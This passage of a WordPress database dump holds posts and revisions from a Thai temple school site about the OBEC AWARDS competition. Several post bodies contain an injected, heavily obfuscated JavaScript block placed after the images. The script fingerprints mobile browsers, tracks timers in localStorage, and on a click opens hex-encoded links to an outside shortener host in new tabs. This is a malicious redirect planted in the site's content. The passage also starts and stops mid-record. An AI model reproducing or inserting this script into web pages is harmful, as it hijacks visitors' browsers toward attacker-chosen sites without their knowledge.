Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','รางวัลทรงคุณค่า OBEC AWARDS การประกวดรางวัลทรงคุณค่า สพฐ.(OBEC AWADS) ระดับภาคตะวันออกเฉียงเหนือ ครั้งที่ 12 ประจำปีการศึกษา 2565-2566','','publish','open','open','','%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b8%a7%e0%b8%b1%e0%b8%a5%e0%b8%97%e0%b8%a3%e0%b8%87%e0%b8%84%e0%b8%b8%e0%b8%93%e0%b8%84%e0%b9%88%e0%b8%b2-obec-awards-%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3','','','2024-09-25 14:28:47','2024-09-25 07:28:47','',0,'http://watprato.ssk.in.th/?p=449',0,'post','',0),
(450,2,'2024-09-25 14:28:27','2024-09-25 07:28:27','','S__95092747_0','','inherit','open','closed','','s__95092747_0','','','2024-09-25 14:28:27','2024-09-25 07:28:27','',449,'http://watprato.ssk.in.th/wp-content/uploads/2024/09/S__95092747_0.jpg',0,'attachment','image/jpeg',0),
(451,2,'2024-09-25 14:28:45','2024-09-25 07:28:45','<!-- wp:generateblocks/image {\"uniqueId\":\"b9559ec7\",\"mediaId\":450,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-b9559ec7\"><img class=\"gb-image gb-image-b9559ec7\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/S__95092747_0.jpg\" alt=\"\" title=\"S__95092747_0\"/></figure>\n<!-- /wp:generateblocks/image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','รางวัลทรงคุณค่า OBEC AWARDS การประกวดรางวัลทรงคุณค่า สพฐ.(OBEC AWADS) ระดับภาคตะวันออกเฉียงเหนือ ครั้งที่ 12 ประจำปีการศึกษา 2565-2566','','inherit','closed','closed','','449-revision-v1','','','2024-09-25 14:28:45','2024-09-25 07:28:45','',449,'http://watprato.ssk.in.th/?p=451',0,'revision','',0),
(452,2,'2024-09-25 14:30:01','2024-09-25 07:30:01','<!-- wp:generateblocks/image {\"uniqueId\":\"6159cfd9\",\"mediaId\":445,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-6159cfd9\"><img class=\"gb-image gb-image-6159cfd9\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/S__95092749_0.jpg\" alt=\"\" title=\"S__95092749_0\"/></figure>\n<!-- /wp:generateblocks/image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','รางวัลทรงคุณค่า OBEC AWARDS การประกวดรางวัลทรงคุณค่า สพฐ.(OBEC AWADS) ระดับภาคตะวันออกเฉียงเหนือ ครั้งที่ 12 ประจำปีการศึกษา 2565-2566 รางวัลทรงคุณค่า OBEC AWARDS','','inherit','closed','closed','','444-revision-v1','','','2024-09-25 14:30:01','2024-09-25 07:30:01','',444,'http://watprato.ssk.in.th/?p=452',0,'revision','',0),
(453,2,'2024-09-25 14:33:08','2024-09-25 07:33:08','<!-- wp:generateblocks/image {\"uniqueId\":\"445cc48c\",\"mediaId\":454,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-445cc48c\"><img class=\"gb-image gb-image-445cc48c\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/S__95092754.jpg\" alt=\"\" title=\"S__95092754\"/></figure>\n<!-- /wp:generateblocks/image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return 